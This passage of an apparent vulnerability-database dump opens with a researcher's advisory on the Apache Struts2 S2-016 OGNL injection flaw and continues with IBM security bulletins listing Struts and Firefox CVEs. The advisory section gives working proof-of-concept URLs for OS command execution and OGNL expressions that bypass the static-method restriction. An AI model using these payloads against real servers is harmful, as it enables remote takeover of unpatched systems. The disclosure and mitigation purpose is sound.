This is\n caused by insecure handling of prefixed special parameters (action:,\n redirect: and redirectAction:) in the DefaultActionMapper class of Struts2.\n\nDetails:\n <About DefaultActionMapper>\n\n Struts2's ActionMapper is a mechanism for mapping between an incoming HTTP\n request and the action to be executed on the server. DefaultActionMapper is\n the default implementation of ActionMapper. It handles four types of\n prefixed parameters: action:, redirect:, redirectAction: and method:.\n\n For example, the redirect prefix is used for HTTP redirects.\n\n Normal redirect prefix usage in JSP:\n <s:form action=\"foo\">\n ...\n <s:submit value=\"Register\"/>\n <s:submit name=\"redirect:http://www.google.com/\" value=\"Cancel\"/>\n </s:form>\n\n If the cancel button is clicked, redirection is performed.\n\n Request URI for redirection:\n /foo.action?redirect:http://www.google.com/\n\n Response Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/\n\n Usage of other prefixed parameters is similar to redirect.\n See the Struts2 documentation for details.\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\n\n <How the Attack Works>\n\n As stated already, there are four types of prefixed parameters.\n\n action:, redirect:, redirectAction:, method:\n\n All except for method: can be used for attacks. But regarding action:,\n it can be used only if wildcard mapping is enabled in configuration.\n On the other hand, redirect: and redirectAction: are not constrained by\n configuration (thus they are convenient for attackers).\n\n One thing that should be noted is that prefixed parameters are quite\n forceful. It means that the behavior of an application which is not intended\n to accept prefixed parameters can also be overridden by prefixed\n parameters added to the HTTP request.
Therefore all Struts2 applications\n that use DefaultActionMapper are vulnerable to the attack.\n\n The injection point is the name of the prefixed parameter.\n An example of an attack using redirect: is shown below.\n\n Attack URI:\n /bar.action?redirect:http://www.google.com/%25{1000-1}\n\n Response Header:\n HTTP/1.1 302 Found\n Location: http://www.google.com/999\n\n As you can see, the expression (1000-1) is evaluated and the result (999)\n appears in the Location response header. As I shall explain later,\n more complex attacks such as OS command execution are possible too.\n\n In DefaultActionMapper, the name of a prefixed parameter is first stored in an\n ActionMapping object and is later evaluated as an OGNL expression.\n The rough method call flow in the execution phase is as follows.\n\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\n\nProof of Concept:\n <PoC URLs>\n\n The PoC is already disclosed on the vendor's web page.\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n\n The PoC URLs below are just quotes from the vendor's page.\n\n Simple Expression:\n http://host/struts2-blank/example/X.action?action:%25{3*4}\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\n\n OS Command Execution:\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n 
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\n\n Obviously such attacks are not specific to the blank/showcase applications,\n but all Struts2-based applications may be subject to attack.\n\n <OS Command Execution and Static Method Call>\n\n Another topic that I think is worth mentioning is that the PoC URLs use\n the ProcessBuilder class to execute OS commands. The merit of using this\n class is that it does not require a static method call to execute OS commands,\n while the Runtime class does.\n\n As you may know, static method calls in OGNL are basically prohibited.\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\n a simple trick:\n\n %{#_memberAccess['allowStaticMethodAccess']=true,\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n In Struts v2.3.14.2, the SecurityMemberAccess class has been changed to\n prevent the trick. However, there are still some techniques to call\n static methods in OGNL.\n\n One technique is to use reflection to replace the static method call with an\n instance method call. Another technique is to overwrite the #_memberAccess\n object itself rather than a property of the object:\n\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n Prevention of static method calls is probably just an additional layer\n of defense, but I think that global objects such as #_memberAccess\n should be protected from rogue updates.\n\nTimeline:\n 2013/06/24 Reported to Struts Security ML\n 2013/07/17 Vendor announced v2.3.15.1\n 2013/08/10 Disclosure of this advisory\n\nRecommendation:\n An immediate upgrade to the latest version is strongly recommended, as\n active attacks have already been observed.
It should be noted that\n the redirect: and redirectAction: parameters were completely dropped and\n do not work in the latest version, as stated on the vendor's page.\n Thus attention to compatibility issues is required when upgrading.\n\n If you cannot upgrade your Struts2 immediately, filtering (by a custom\n servlet filter, IPS, WAF and so on) can be a mitigation for\n this vulnerability. Some points about a filtering solution are listed\n below.\n\n - Both the %{expr} and ${expr} notations can be used for attacks.\n - Parameters both in the query string and in the request body can be used.\n - redirect: and redirectAction: can be used not only for Java method\n execution but also for open redirects.\n\n See S2-017 (CVE-2013-2248) for the open redirect issue.\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\n\nReference:\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n https://cwiki.apache.org/confluence/display/WW/ActionMapper", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-03-14T23:45:43", "description": "## Abstract\n\nIBM Storwize V7000 Unified includes multiple software components for which the vendors have provided fixes for security vulnerabilities in such components.\n\n## Content\n\n**VULNERABILITY DETAILS: ** \n \n**CVE ID:** \n \n\n\n**Vendor **| **Vendor ID**| **Vendor Title**| **Included CVEs** \n---|---|---|--- \nRed Hat| [_RHSA-2013-0981_](<http://rhn.redhat.com/errata/RHSA-2013-0981.html>)| Critical: firefox security update| CVE-2013-1682 \nCVE-2013-1684 \nCVE-2013-1685 \nCVE-2013-1686 \nCVE-2013-1687 \nCVE-2013-1690 \nCVE-2013-1692 \nCVE-2013-1693 \nCVE-2013-1694 \nCVE-2013-1697 \nRed Hat | [_RHSA-2013-0820_](<https://rhn.redhat.com/errata/RHSA-2013-0820.html>)| Critical: firefox security update (May 2013)| CVE-2013-0801 \nCVE-2013-1670 \nCVE-2013-1674 \nCVE-2013-1675 \nCVE-2013-1676 \nCVE-2013-1677 \nCVE-2013-1678 \nCVE-2013-1679 \nCVE-2013-1680 \nCVE-2013-1681 \nIBM | \n| Unauthorized access 
exposure on IBM Storwize V7000 GUI| CVE-2013-2251 \nCVE-2013-2248 \nCVE-2013-2135 \nCVE-2013-2134 \nCVE-2013-2115 \nCVE-2013-1966 \nCVE-2013-1965 \n \n**DESCRIPTION:** \nIBM Storwize V7000 Unified has integrated updated versions of the software components for which the vendors have provided fixes for security vulnerabilities. Specific details can be found in the Reference section links below. \n \n**CVSS:** \n \n_Red Hat RHSA-2013-0981_ \n \nCVE-2013-1682 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See[ http://xforce.iss.net/xforce/xfdb/85194](<http://xforce.iss.net/xforce/xfdb/85194>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1684 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85254> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1685 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85255> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1686 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85256> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1687 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85257> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1690 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85259> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n \nCVE-2013-1692 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85261> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n 
\nCVE-2013-1693 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85262> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \nCVE-2013-1694 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85263> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1697 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85267> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n_RHSA-2013-0820_ \n \nCVE-2013-0801 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84252> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1670 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84254> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \nCVE-2013-1674 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84258> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1675 \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84259> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \nCVE-2013-1676 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84260> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1677 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84261> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1678 \nCVSS Base 
Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84262> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1679 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84263> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1680 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84264> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1681 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84265> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n_IBM_ \nThe vulnerabilities below are applicable to the IBM Storwize V7000 GUI, and do not affect the Storwize V7000 Unified GUI. The vulnerabilities can be exploited by a user with access to the IBM Storwize V7000 management IP interface using vulnerabilities in the Apache Struts component. If successful, the user can gain access with \"superuser\" privilege, which allows any modification to the configuration, including complete deletion.
\n \n[_CVE-2013-2251_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-2248_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2248>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n[_CVE-2013-2135_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2135>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-2134_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2134>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-2115_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-1966_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n 
\n[_CVE-2013-1965_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1965>) \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n \n**AFFECTED PLATFORMS: **\n\n * **_Affected releases:_** IBM Storwize V7000 Unified 1.3.0.0 through 1.4.1.X.\n * **_Releases/systems/configurations NOT affected:_** IBM Storwize V7000 Unified 1.4.2.0 and above.\n \n\n\n**REMEDIATION: **\n\n \n**_Vendor Fix(es):_** The issues were fixed beginning with version IBM Storwize V7000 Unified 1.4.2.0. IBM Storwize V7000 Unified customers running an earlier version (e.g. IBM Storwize V7000 Unified 1.3.2.0 or 1.4.1.1) must upgrade to IBM Storwize V7000 Unified 1.4.2.0 or a later version in order to get these fixes. \n \n \n**_Workaround(s):_** None. \n \n \n**_Mitigation(s):_** IBM Storwize V7000 Unified is not exposed to CVEs related to Firefox and Xulrunner during normal operation. Service procedures which use the Firefox web browser may activate the vulnerable code. Service personnel must not browse web pages on the internet to avoid the processing of web pages with malicious content. \nTo mitigate \"Unauthorized access exposure on IBM Storwize V7000\", access to the Storwize V7000 management IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability related to unauthorized access to Storwize V7000. 
\n \n**REFERENCES: ** \n\n\n * [_Complete CVSS guide_](<http://www.first.org/cvss/v2/guide>)\n * [_On-line Calculator V2_](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n * [_RHSA-2013-0981_](<http://rhn.redhat.com/errata/RHSA-2013-0981.html>)\n * [_RHSA-2013-0820_](<https://rhn.redhat.com/errata/RHSA-2013-0820.html>)\n \n \n**RELATED INFORMATION: ** \n\n\n * [_IBM Secure Engineering Web Portal_](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)\n * [_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>)\n \n \n**CHANGE HISTORY: ** \n\n\n * 10/15/2013: Original copy published.\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" _ \n_IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n[{\"Product\":{\"code\":\"ST5Q4U\",\"label\":\"IBM Storwize V7000 Unified (2073)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"1.4\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.3;1.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-06-18T00:07:17", "type": "ibm", "title": "Security Bulletin: IBM Storwize V7000 Unified Update Includes Fixes for Multiple Vendor Security Vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0801", "CVE-2013-1670", "CVE-2013-1674", "CVE-2013-1675", "CVE-2013-1676", "CVE-2013-1677", "CVE-2013-1678", "CVE-2013-1679", "CVE-2013-1680", "CVE-2013-1681", "CVE-2013-1682", "CVE-2013-1684", "CVE-2013-1685", "CVE-2013-1686", "CVE-2013-1687", "CVE-2013-1690", "CVE-2013-1692", "CVE-2013-1693", "CVE-2013-1694", "CVE-2013-1697", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", 
"CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-06-18T00:07:17", "id": "E4B17BF9EB94818B3DD67E5BE6300EFD410A818EA54EBAE7A739EFDF92086058", "href": "https://www.ibm.com/support/pages/node/689307", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:08:45", "description": "## Summary\n\nStruts vulnerabilities affect IBM InfoSphere Information Server. IBM InfoSphere Information Server has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-4430_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4430>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed expression to bypass token validation. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114185_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114185>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-4431_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4431>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the default action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass internal security mechanism and redirect the victim to an arbitrary site. 
\nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114187_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114187>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4433_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4433>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the Getter as action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass an internal security mechanism and redirect the victim to an arbitrary site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114186_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114186>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4436_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4436>) \n**DESCRIPTION:** An unspecified error in Apache Struts related to the method used to clean up the action name has an unknown impact and attack vector. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114183_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4438_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4438>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system. By passing a malicious expression when using the REST Plugin, an attacker could exploit this vulnerability to execute arbitrary code on the system.
\nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114184_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114184>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2016-4465_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4465>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by an error when using a built-in URLValidator. An attacker could exploit this vulnerability to overload the server process. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114188_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114188>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [_CVE-2016-0785_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0785>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double OGNL evaluation of attribute values. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111513_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111513>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n \n**CVEID:** [_CVE-2016-2162_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2162>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the I18NInterceptor. 
A remote attacker could exploit this vulnerability using a specially crafted URL to execute script in a victim's web browser within the security context of the hosting website once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base Score: 6.1
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/111515](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111515>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**CVEID:** [CVE-2016-4003](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4003>)
**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially crafted URL to execute script in a victim's web browser within the security context of the hosting website once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
CVSS Base Score: 6.1
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

**CVEID:** [CVE-2016-3081](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3081>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base Score: 5.6
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:** [CVE-2016-3082](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3082>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse an arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system.
CVSS Base Score: 7.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:** [CVE-2016-3087](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3087>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability using the REST Plugin to execute arbitrary code on the system.
CVSS Base Score: 8.1
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/113685](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113685>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2016-3093](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3093>)
**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by the improper implementation of the cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a website.
CVSS Base Score: 5.3
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:** [CVE-2016-1181](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1181>)
**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a failure to protect against unintended remote operations on components in server memory through the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base Score: 8.1
CVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/113852](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:** [CVE-2016-1182](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1182>)
